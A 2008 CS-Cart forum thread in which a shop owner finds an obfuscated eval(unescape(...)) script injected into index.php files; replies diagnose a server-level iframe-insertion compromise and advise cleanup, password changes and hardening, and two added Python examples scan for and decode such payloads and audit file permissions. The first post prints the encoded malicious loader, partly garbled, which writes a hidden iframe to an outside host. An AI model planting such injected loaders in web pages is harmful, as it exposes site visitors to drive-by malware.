hacked script insert file index.html and index.php

 
  • vega
  • Member
  • Members
  • Join Date: 14-Dec 07
  • 57 posts

Posted 24 January 2008 - 09:43 PM #1

I have set folder and file permissions following this thread:
http://forum.cs-cart...read.php?t=4549

i have Linux – Running PHP as an Apache module

I cannot understand why in the main index.php file, and in the index.php file present in the target core, I find the following script inserted in the code:

<! - Or --><!-- -> <script> eval (unescape ( "% 77% 69% 64% 6th% 6f% 2nd% 77% 73% 74% 61% 74% 75% 73 % 3d% 27% 44% 6f% 6th% 65% 27% 3b% 6f% 64% 63% 75% 65% 6d% 6th% 2nd% 74% 77% 72% 69% 74% 65% 28% 27% 3c % 69% 66% 72% 61% 6d% 65% 20% 61% 6th% 6d% 3d% 65% 66% 39% 20% 73% 72% 63% 3d% 5c% 27% 68% 74% 74% 70 % 3a% 2f% 2f% 74% 72% 61% 66% 66% 75% 72% 6c% 2nd% 72% 75% 73% 2f% 6c% 69% 76% 27% 3f% 2b% 4d% 61% 74 2nd% 68% 72%% 6f% 75% 64% 6th% 4d% 28% 61% 74% 68% 2nd% 72% 61% 64% 6th% 6f% 6d% 28% 29% 2nd% 38% 37% 37 % 32% 33% 29% 2b% 27% 63% 63% 38% 64% 64% 32% 33% 36% 32% 65% 5c% 27% 20% 77% 69% 64% 74% 68% 32% 3d % 34% 33% 20% 68% 65% 69% 67% 68% 74% 3d% 33% 36% 31% 20% 73% 74% 79% 65% 6c% 3d% 5c% 27% 64% 69% 73 6c% 70% 79% 61% 20%% 3a% 6th% 6f% 6th% 5c% 65% 27% 3rd% 3c% 2f% 69% 66% 72% 61% 65% 6d% 3rd% 27% 29 ") ) </ script>
------------------
Simone
Rome - Italy
Sorry for my horrible English ;)

 
  • TonyK
  • Member
  • Members
  • Join Date: 03-Mar 06
  • 1686 posts

Posted 24 January 2008 - 09:46 PM #2

What is the full path of the index.php? You don't really say what folder this file is located in.
Pimpin' skins since v1.0

 
  • vega
  • Member
  • Members
  • Join Date: 14-Dec 07
  • 57 posts

Posted 24 January 2008 - 11:31 PM #3

> What is the full path of the index.php? You don't really say what folder this file is located in.


Thanks for your answer.
I know where they are; I do not know why this script is inserted despite the permissions set on the folders.
I refer also to several other index.php files in the store folders (core, target, includes, payments, var ...).
The main store index.php file is in the root of the site.

 
  • The Tool
  • Been Here Way Too Long Member
  • Members
  • Join Date: 30-Mar 07
  • 3732 posts

Posted 25 January 2008 - 06:43 AM #4

Could have just been a corrupt file? I am no coder, but it doesn't look like it does anything.

Just fix it and if it happens again, then I would worry.

 
  • S-Combs
  • Senior Member
  • Members
  • Join Date: 09-Nov 06
  • 692 posts

Posted 25 January 2008 - 11:56 AM #5

Your web server has been compromised vega. Bring this issue up to your host and advise them to scan other user accounts on that machine for the same problem as well within index files. This appears to be another variation of the malicious <iframe> insertion hack that was popular a while back. This is usually caused by weaknesses in the server's security that a hacker has found a way to insert shell commands or gain full shell access with ‘at least’ Apache ownership/permissions.

My advice to you is to remove all occurrences of this script in all files and carefully inspect all other files on your account for other code changes or additional files which may have been added. Also change your control panel/ftp passwords asap but this won’t help you much if the server itself has been compromised.
Secure Cart Hosting
[CS-Cart Optimized Solutions and Server Management]
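An added example (not from the thread or from CS-Cart) of the inspection S-Combs recommends: it percent-decodes every eval(unescape("...")) payload found under a web root without executing it and flags the hidden-iframe trait; the sample file and the malware.invalid URL are constructed.

```python
import os
import re
import tempfile
from urllib.parse import quote, unquote

# eval(unescape("...")) with a %xx-encoded payload, tolerant of inserted whitespace
EVAL_UNESCAPE = re.compile(
    r'eval\s*\(\s*unescape\s*\(\s*(["\'])([^"\']+)\1\s*\)\s*\)', re.IGNORECASE)
HIDDEN_IFRAME = re.compile(r'<iframe[^>]*display\s*:\s*none', re.IGNORECASE)
SCAN_EXT = ('.php', '.html', '.htm', '.js')

def decode_payloads(source):
    """Decode every eval(unescape(...)) payload in source. Only percent-decoding
    is done; the JavaScript is never executed."""
    return [unquote(re.sub(r'\s+', '', m.group(2)))
            for m in EVAL_UNESCAPE.finditer(source)]

def classify(decoded):
    """Flag the traits of the iframe-insertion hack discussed in the thread."""
    return {"hidden_iframe": bool(HIDDEN_IFRAME.search(decoded)),
            "writes_dom": "document.write" in decoded,
            "decoded": decoded}

def scan_tree(root):
    """Walk a web root and report each injected payload with its file path."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding='utf-8', errors='replace') as fh:
                for decoded in decode_payloads(fh.read()):
                    findings.append(dict(classify(decoded), file=path))
    return findings

# Constructed sample (not a real payload): a placeholder URL is percent-encoded
# the same way the injected script quoted in the thread is.
INJECTED_JS = ("document.write('<iframe src=\\'http://malware.invalid/x\\' "
               "width=1 height=1 style=\\'display:none\\'></iframe>')")
SAMPLE_PHP = ('<?php /* store code */ ?>\n<!-- --><script>eval (unescape ( "'
              + quote(INJECTED_JS, safe='') + '" ) ) </script>\n')

def demo():
    """Write the sample into a temporary web root, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, 'skins'))
        with open(os.path.join(root, 'index.php'), 'w') as fh:
            fh.write(SAMPLE_PHP)
        with open(os.path.join(root, 'skins', 'clean.php'), 'w') as fh:
            fh.write('<?php echo "ok"; ?>\n')
        return scan_tree(root)

if __name__ == '__main__':
    for f in demo():
        print(f['file'], 'hidden iframe' if f['hidden_iframe'] else '', f['decoded'][:60])
```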

 
  • S-Combs
  • Senior Member
  • Members
  • Join Date: 09-Nov 06
  • 692 posts

Posted 27 January 2008 - 05:19 PM #6

There is a new much worse variation of that <iframe> insertion hack going around right now vega as I expected above.

I am not positive this is the exact exploit affecting your site but do know that it is at least a variation of it. You should definitely ask your host to investigate your server asap because it can be very dangerous to your visitors and customers.

http://blog.cpanel.net/?p=31
http://www.cpanel.ne...js_toolkit.html
http://www.finjan.co...sLan=1819&lan=3

http://www.google.co...ndom_js_toolkit

I will note that this is not related to cs-cart security or permissions within your account. This is a kernel level server exploit that affects every site hosted on the infected machine.

 
  • vega
  • Member
  • Members
  • Join Date: 14-Dec 07
  • 57 posts

Posted 05 February 2008 - 11:17 PM #7

> There is a new much worse variation of that <iframe> insertion hack going around right now vega as I expected above.
>
> I am not positive this is the exact exploit affecting your site but do know that it is at least a variation of it. You should definitely ask your host to investigate your server asap because it can be very dangerous to your visitors and customers.
>
> http://blog.cpanel.net/?p=31
> http://www.cpanel.ne...js_toolkit.html
> http://www.finjan.co...sLan=1819&lan=3
>
> http://www.google.co...ndom_js_toolkit
>
> I will note that this is not related to cs-cart security or permissions within your account. This is a kernel level server exploit that affects every site hosted on the infected machine.



I contacted my host and they say there is not any intrusion.

 
  • S-Combs
  • Senior Member
  • Members
  • Join Date: 09-Nov 06
  • 692 posts

Posted 06 February 2008 - 12:03 AM #8

They may be telling you that it wasn't an intrusion but it's not truthful.

 
  • TonyK
  • Member
  • Members
  • Join Date: 03-Mar 06
  • 1686 posts

Posted 06 February 2008 - 01:46 PM #9

Must be the script fairy came by and left you a present.

Were you a good boy?:twisted:

Time to switch hosts.

 
  • vega
  • Member
  • Members
  • Join Date: 14-Dec 07
  • 57 posts

Posted 10 February 2008 - 07:14 PM #10

> They may be telling you that it wasn't an intrusion but it's not truthful.


This is what I think myself. They damage their reputation.
For the moment I changed the password of my server. At this point it would be useful for me to know exactly what permissions I have to set.

 
  • vega
  • Member
  • Members
  • Join Date: 14-Dec 07
  • 57 posts

Posted 10 February 2008 - 07:17 PM #11

> Must be the script fairy came by and left you a present.
>
> Were you a good boy? :twisted:
>
> Time to switch hosts.




They may have found my login. Do you think this is possible, or is it more likely that there is a hole in my host?

I read messages with various different views on what permissions to set, and I did not understand which are the most correct for safety.
My host is UNIX
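An added example (not from the thread) for the permissions question above: it walks a web root and reports entries writable by everyone, plus regular files changed since a baseline such as the time of the last good backup; the directory layout is constructed and a Linux/UNIX filesystem is assumed.

```python
import os
import stat
import tempfile
import time

def audit_web_root(root, baseline_epoch):
    """Report directories and files writable by 'other' (world-writable) and
    regular files whose mtime is later than baseline_epoch."""
    world_writable, changed_since = [], []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)          # lstat: do not follow symlinks
            rel = os.path.relpath(path, root)
            if st.st_mode & stat.S_IWOTH:
                world_writable.append(rel)
            if stat.S_ISREG(st.st_mode) and st.st_mtime > baseline_epoch:
                changed_since.append(rel)
    return {"world_writable": sorted(world_writable),
            "changed_since_baseline": sorted(changed_since)}

def demo():
    """Constructed layout: a store installed 30 days ago, one cache directory
    and one session file left world-writable, and core/index.php rewritten
    yesterday. Returns the audit result."""
    now = time.time()
    baseline = now - 30 * 86400
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, 'var', 'cache'))
        os.makedirs(os.path.join(root, 'core'))
        for d in ('var', 'core'):
            os.chmod(os.path.join(root, d), 0o755)   # normal, not world-writable
        files = [('index.php', 0o644, baseline - 60),
                 ('core/index.php', 0o644, now - 86400),
                 ('var/cache/sess.php', 0o666, baseline - 60)]
        for rel, mode, mtime in files:
            path = os.path.join(root, rel)
            with open(path, 'w') as fh:
                fh.write('<?php ?>\n')
            os.chmod(path, mode)
            os.utime(path, (mtime, mtime))
        os.chmod(os.path.join(root, 'var', 'cache'), 0o777)
        return audit_web_root(root, baseline)

if __name__ == '__main__':
    print(demo())
```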

 
  • ThomH
  • Senior Member
  • Members
  • Join Date: 20-Nov 07
  • 1548 posts

Posted 11 February 2008 - 05:02 AM #12

You can find an online decoder here.



 
  • Earl
  • Member
  • Members
  • Join Date: 30-Oct 07
  • 44 posts

Posted 18 February 2008 - 09:21 PM #13

You want to take a look at this article 10 Steps to Securing your Server.
http://www.webhostgear.com/314.html

You may want to install a firewall with ingress and egress filtering such as APF or CSF firewall (if you have cpanel), block all unused ports and stop unused services if you don't have one already; also install a rootkit detector such as CHKROOTKIT. If possible change the SSH port to a non standard port.

Maybe you have done these already or not, but just in case. Oh, and some bad news: it may be good to have your host re-install the server OS, and if possible you should restore your site from a good backup.
Earl
Cs-Cart 1.3.5 sp2 | Linux VPS Hosting | MySql 5.0.27 | PHP 5.2.6

 
  • vega
  • Member
  • Members
  • Join Date: 14-Dec 07
  • 57 posts

Posted 13 March 2008 - 11:08 PM #14

Sorry that I answer only today.
With regard to my problem, I contacted my hosting and the response was very professional: "we can not control all of the pages of our clients".
However, I changed the access information and the problem seems solved.
I remember that I gave your support my login shortly after I bought cs cart. Are we confident that these data have been carefully preserved? .. I hope so.
Thanks to all

 
  • VGC
  • Member
  • Members
  • Join Date: 17-Jul 08
  • 33 posts

Posted 17 July 2008 - 08:21 PM #15

I am new to php since I'm a Java guy and in 10 years of Java development no hackers ever cracked our servers. I'm surprised this is happening to the php world, but then again, Java is difficult to understand:-) I've taken all the steps that S-Combs described in our threads, so I hope it doesn't happen to me.

VGC